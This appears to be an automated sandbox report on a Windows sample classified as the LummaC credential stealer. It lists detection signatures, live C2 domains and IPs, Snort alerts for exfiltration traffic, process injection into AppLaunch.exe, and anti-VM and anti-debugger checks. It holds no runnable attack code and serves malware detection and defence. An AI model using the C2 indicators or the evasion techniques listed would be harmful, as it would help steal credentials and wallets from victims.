Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1330868
MD5:	863219f7d35d1e33f1b05ddc2bb42faa
SHA1:	2a12d30bb5d171d933b7c0c5ec23266d093335c5
SHA256:	9de7f524dcaf5b3f154521233d410711f0ae0c139bfeec16441c342534ffbc80
Tags:	exe
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected LummaC Stealer

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Hides threads from debuggers

Tries to detect sandboxes and other dynamic analysis tools (window names)

Writes to foreign memory regions

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Searches for user specific document files

Entry point lies outside standard sections

Contains long sleeps (>= 3 min)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Contains capabilities to detect virtual machines

PE / OLE file has an invalid certificate

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 7468 cmdline: C:\Users\user\Desktop\file.exe MD5: 863219F7D35D1E33F1B05DDC2BB42FAA)

AppLaunch.exe (PID: 7548 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["dannyleagy.fun", "suprafo.fun"], "Build Id": "TRNGVa--stream"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1722309595.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 7548	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 7548	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Snort Signatures

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In - Source IP: 192.168.2.4 - Destination IP: 104.21.92.91

Timestamp:	192.168.2.4104.21.92.9149739802048093 10/24/23-00:06:04.375807
SID:	2048093
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 104.21.92.91

Timestamp:	192.168.2.4104.21.92.9149738802048094 10/24/23-00:06:04.844317
SID:	2048094
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.4 - Destination IP: 104.21.92.91

Timestamp:	192.168.2.4104.21.92.9149769802048094 10/24/23-00:06:39.731770
SID:	2048094
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Length: 8Host: suprafox.fun

Source: unknown

DNS traffic detected: queries for: suprafox.fun

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 1_2_004411A2 GetProcAddress,GetProcAddress,_strlen,InternetCloseHandle,InternetConnectA,GetProcAddress,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,GetProcAddress,HttpSendRequestA,GetProcAddress,HttpOpenRequestW,GetProcAddress,GetModuleHandleW,GetProcAddress,InternetOpenW,HttpAddRequestHeadersA,

1_2_004411A2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D08B6B0	0_2_6D08B6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D082D70	0_2_6D082D70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0DAC29	0_2_6D0DAC29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B4EE0	0_2_6D0B4EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A4970	0_2_6D0A4970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D068B30	0_2_6D068B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0D0B89	0_2_6D0D0B89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A4AC0	0_2_6D0A4AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0DA54D	0_2_6D0DA54D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A4550	0_2_6D0A4550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D06C7B0	0_2_6D06C7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D06A7E0	0_2_6D06A7E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D066650	0_2_6D066650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D07A0C0	0_2_6D07A0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0C2310	0_2_6D0C2310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B63B0	0_2_6D0B63B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B5DD0	0_2_6D0B5DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0D5DD2	0_2_6D0D5DD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A3C90	0_2_6D0A3C90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0C1CA0	0_2_6D0C1CA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0D9FFC	0_2_6D0D9FFC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0DBFF1	0_2_6D0DBFF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A3E50	0_2_6D0A3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B5EB9	0_2_6D0B5EB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0DB964	0_2_6D0DB964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B5830	0_2_6D0B5830
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B58D7	0_2_6D0B58D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B58D5	0_2_6D0B58D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0D9AAB	0_2_6D0D9AAB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A3460	0_2_6D0A3460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B5050	0_2_6D0B5050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0A3260	0_2_6D0A3260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0B5274	0_2_6D0B5274
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03254548	0_2_03254548
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03253430	0_2_03253430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03257E08	0_2_03257E08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_060F2840	0_2_060F2840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_060F0EB3	0_2_060F0EB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_060F2822	0_2_060F2822
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_060F0930	0_2_060F0930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03251001	0_2_03251001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00406039	1_2_00406039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040B1A0	1_2_0040B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004411A2	1_2_004411A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040F28D	1_2_0040F28D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00409334	1_2_00409334
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0042B410	1_2_0042B410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0043A56C	1_2_0043A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00420598	1_2_00420598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0043B69C	1_2_0043B69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004048EA	1_2_004048EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00429998	1_2_00429998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00435ACF	1_2_00435ACF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00423CDA	1_2_00423CDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00437DF4	1_2_00437DF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00436ED7	1_2_00436ED7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00411F5A	1_2_00411F5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00426F24	1_2_00426F24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00403FF2	1_2_00403FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040DFB0	1_2_0040DFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00451010	1_2_00451010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0044C0A4	1_2_0044C0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00467250	1_2_00467250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00416260	1_2_00416260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041A2D3	1_2_0041A2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0044B3E4	1_2_0044B3E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004144D2	1_2_004144D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0046C4F8	1_2_0046C4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00414509	1_2_00414509
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004255C1	1_2_004255C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041160C	1_2_0041160C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0044E6C3	1_2_0044E6C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041D684	1_2_0041D684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00424727	1_2_00424727
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004187AD	1_2_004187AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00440805	1_2_00440805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00413818	1_2_00413818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004198B6	1_2_004198B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0046596E	1_2_0046596E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0045196B	1_2_0045196B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041E9CD	1_2_0041E9CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041C986	1_2_0041C986
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004449B2	1_2_004449B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00443A53	1_2_00443A53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0044DAFF	1_2_0044DAFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040CB56	1_2_0040CB56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00415BF4	1_2_00415BF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041ABB4	1_2_0041ABB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00447C20	1_2_00447C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00445CEE	1_2_00445CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0041BCB6	1_2_0041BCB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00416D14	1_2_00416D14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040BDDF	1_2_0040BDDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00418E50	1_2_00418E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00422E60	1_2_00422E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0045DF44	1_2_0045DF44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00427F71	1_2_00427F71

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6D0CD520 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6D0C9B35 appears 141 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6D0C90D8 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: String function: 004474E0 appears 49 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040F28D lstrcatW,lstrcmpW,NtCreateFile,lstrlenW,lstrcmpW,lstrcmpW,NtQueryDirectoryFile,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,NtClose,lstrcatW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrcatW,	1_2_0040F28D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040ECAB NtClose,NtReadFile,	1_2_0040ECAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0040DFB0 lstrcatW,lstrlenW,lstrcatW,NtCreateFile,lstrlenW,	1_2_0040DFB0

Source: file.exe, 00000000.00000002.1721676204.0000000003951000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs file.exe
Source: file.exe, 00000000.00000002.1722309595.000000000517D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRon.dll( vs file.exe
Source: file.exe, 00000000.00000002.1722309595.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRon.dll( vs file.exe
Source: file.exe, 00000000.00000002.1727889686.0000000005D68000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRon.dll( vs file.exe
Source: file.exe, 00000000.00000002.1729816988.0000000006141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs file.exe
Source: file.exe, 00000000.00000000.1647148915.0000000000A78000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameentertainment_software_for_home.exe`@ vs file.exe
Source: file.exe, 00000000.00000002.1729488322.00000000060C0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameProtect.dll8 vs file.exe
Source: file.exe, 00000000.00000002.1720437252.0000000001491000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1717864883.0000000000A3F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameentertainment_software_for_home.exe`@ vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameentertainment_software_for_home.exe`@ vs file.exe

Source: file.exe

Static PE information: invalid certificate

Source: file.exe

Static PE information: Section: ZLIB complexity 0.999957997311828

Source: file.exe

ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@3/2@1/1

Source: C:\Users\user\Desktop\file.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 1_2_00409334 GetProcAddress,GetProcAddress,Process32NextW,Process32FirstW,GetProcAddress,CreateToolhelp32Snapshot,FindCloseChangeNotification,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,

1_2_00409334

Source: C:\Users\user\Desktop\file.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static file information: File size 4075136 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x21de00
Source: file.exe	Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x194000

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: file.exe, 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.1722309595.0000000004FF1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727889686.0000000005BE0000.00000004.10000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1722309595.0000000004951000.00000004.00000800.00020000.00000000.sdmp, Protect544cd51a.dll.0.dr
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: file.exe, 00000000.00000002.1718065926.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: file.exe, 00000000.00000002.1727889686.0000000005C9A000.00000004.10000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1722309595.00000000050AF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1722309595.0000000004F22000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.800000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0CCC2B push ecx; ret	0_2_6D0CCC3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6D0CD565 push ecx; ret	0_2_6D0CD578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_0042B410 push eax; mov dword ptr [esp], 953EC525h	1_2_004356D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_004356D5 push eax; mov dword ptr [esp], 953EC525h	1_2_004356D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00401BE0 push eax; mov dword ptr [esp], 00000000h	1_2_00401BE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00461DC8 push ecx; ret	1_2_00461DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 1_2_00470DF5 push esi; ret	1_2_00470DFE

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .themida
Source: file.exe	Static PE information: section name: .boot

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6D07B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6D07B6C0

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: file.exe

Static PE information: 0xD3C590F9 [Sun Aug 2 23:51:21 2082 UTC]

Source: initial sample

Static PE information: section name: .boot entropy: 7.901810533884448

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe	System information queried: FirmwareTableInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	System information queried: FirmwareTableInformation			Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe

File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Jump to behavior

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: 1_2_00401000 GetSystemDefaultUILanguage,GetUserDefaultLangID,GetSystemDefaultLangID,GetUserDefaultUILanguage,ExitProcess, lea eax, dword ptr [esi-00000419h]

1_2_00401000

Source: C:\Users\user\Desktop\file.exe TID: 7528	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7568	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

1_2_00426F24

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

